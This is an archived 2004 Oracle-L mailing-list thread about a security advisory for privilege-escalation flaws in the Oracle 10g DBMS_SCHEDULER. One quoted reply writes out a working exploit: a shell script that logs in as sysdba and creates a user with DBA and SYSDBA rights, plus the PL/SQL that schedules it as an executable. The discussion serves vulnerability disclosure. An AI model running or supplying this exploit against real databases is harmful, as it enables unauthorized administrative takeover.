Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> Re[2]: PeteFinnigan.com Oracle advisory for bugs in dbms_scheduler ( alert #68)

Re[2]: PeteFinnigan.com Oracle advisory for bugs in dbms_scheduler ( alert #68)

From: Jonathan Gennick <jonathan_at_gennick.com>
Date: Thu, 2 Sep 2004 16:16:23 -0400
Message-ID: <351326433961.20040902161623@gennick.com> 





Well, the whole world knows now...



Best regards,



Jonathan Gennick --- Brighten the corner where you are
http://Gennick.com * 906.387.1698 * mailto:jonathan@gennick.com



Join the Oracle-article list and receive one
article on Oracle technologies per month by 
email. To join, visit http://five.pairlist.net/mailman/listinfo/oracle-article, 
or send email to Oracle-article-request_at_gennick.com and 
include the word "subscribe" in either the subject or body.




Thursday, September 2, 2004, 12:00:41 PM, Gogala, Mladen (Mladen.Gogala_at_aetn.com) wrote:

GM> What annoys me the most is that the bug is so trivial 
GM> that it should have been discovered during the beta test.
GM> You and Pete didn't specify how exactly is it possible, probably
GM> out of the goodness of your heart, so I did a little investigation
GM> of my own, and discovered that Oracle10g alows shell scripts to
GM> be scheduled using DBMS_SCHEDULER. Of course, DBMS_SCHEDULER still
GM> uses job queue processes owned by user oracle to schedule those
GM> shell scripts. The thing that can be done is to schedule a shell
GM> script containing the following sequence:
GM> #!/bin/ksh
GM> set -a 
GM> echo "Operator, are you pondering what I am pondering?">/dev/console
GM> ORAENV_ASK=NO
GM> ORACLE_SID=<sid>
GM> . /usr/local/bin/oraenv
GM> sqlplus "/ as sysdba"<<EOF
GM> create user brain identified by takeover
GM> default tablespace system;
GM> grant connect,resource,dba to brain;
GM> grant sysdba to brain;
GM> EOF





GM> If this script is executed by a process owned by user "oracle",
GM> "connect / as sysdba" will succeed. The database is mine.



GM> All you need to do is it to run something like this:


GM> BEGIN
GM> DBMS_SCHEDULER.CREATE_PROGRAM (
GM>    program_name           => 'take_over_the_world',
GM>    program_action         => '/tmp/pinky_and_the_brain',
GM>    program_type           => 'EXECUTABLE',
GM>    comments               => 'I rulez');
GM> END;
GM> /

GM> and you are ready to create the job and run it. I was astonished 
GM> how simple and trivial the flaw is. Someone should have thought of


GM> that during beta testing. Now, let me put on a wide smile and ask:
GM> is that the bug that you and Pete have found?


GM> --
GM> Mladen Gogala
GM> Oracle DBA
GM> email:mladeng_at_aetvn.com
GM> Ext: 9787






>> -----Original Message-----

>> From: Jonathan Gennick [mailto:jonathan_at_gennick.com] 

>> Sent: Thursday, September 02, 2004 8:33 AM

>> To: Pete Finnigan

>> Cc: oracle-l_at_freelists.org

>> Subject: Re: PeteFinnigan.com Oracle advisory for bugs in 

>> dbms_scheduler (alert #68)

>> 

>> 

>> This alert apparently covers several flaws. I'm actually 

>> taken-aback by how long it's taken Oracle to respond to the 

>> one Pete and I uncovered back in March, which let's you 

>> leverage the new scheduler to gain access to the Oracle user, 

>> and thence to grant yourself DBA privileges.

>> 

>> Best regards,

>> 

>> Jonathan Gennick --- Brighten the corner where you are 

GM> http://Gennick.com * 906.387.1698 * mailto:jonathan@gennick.com


GM> Join the Oracle-article list and receive one
GM> article on Oracle technologies per month by 
GM> email. To join, visit
GM> http://five.pairlist.net/mailman/listinfo/oracle-article, 
GM> or send email to Oracle-article-request_at_gennick.com and 
GM> include the word "subscribe" in either the subject or body.


GM> Wednesday, September 1, 2004, 3:06:15 PM, Pete Finnigan


GM> (oracle_list_at_peterfinnigan.demon.co.uk) wrote:
PF>> Hi everyone,


PF>> Oracle released last night alert #68 covering fixes for many 
PF>> security bugs in Oracle. PeteFinnigan.com found security bugs in the 
PF>> new 10gR1 scheduler functionality. Our security advisory can be 
PF>> found at http://www.petefinnigan.com/alerts.htm





PF>> Kind regards



PF>> Pete


GM> ---
GM> To unsubscribe - mailto:oracle-l-request_at_freelists.org&subject=unsubscribe 
GM> To read recent messages - http://freelists.org/archives/oracle-l/09-2004
GM> ---
GM> To unsubscribe - mailto:oracle-l-request_at_freelists.org&subject=unsubscribe 
GM> To read recent messages - http://freelists.org/archives/oracle-l/09-2004




---
To unsubscribe - mailto:oracle-l-request_at_freelists.org&subject=unsubscribe 
To read recent messages - http://freelists.org/archives/oracle-l/09-2004


Received on Thu Sep 02 2004 - 19:13:39 CDT












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US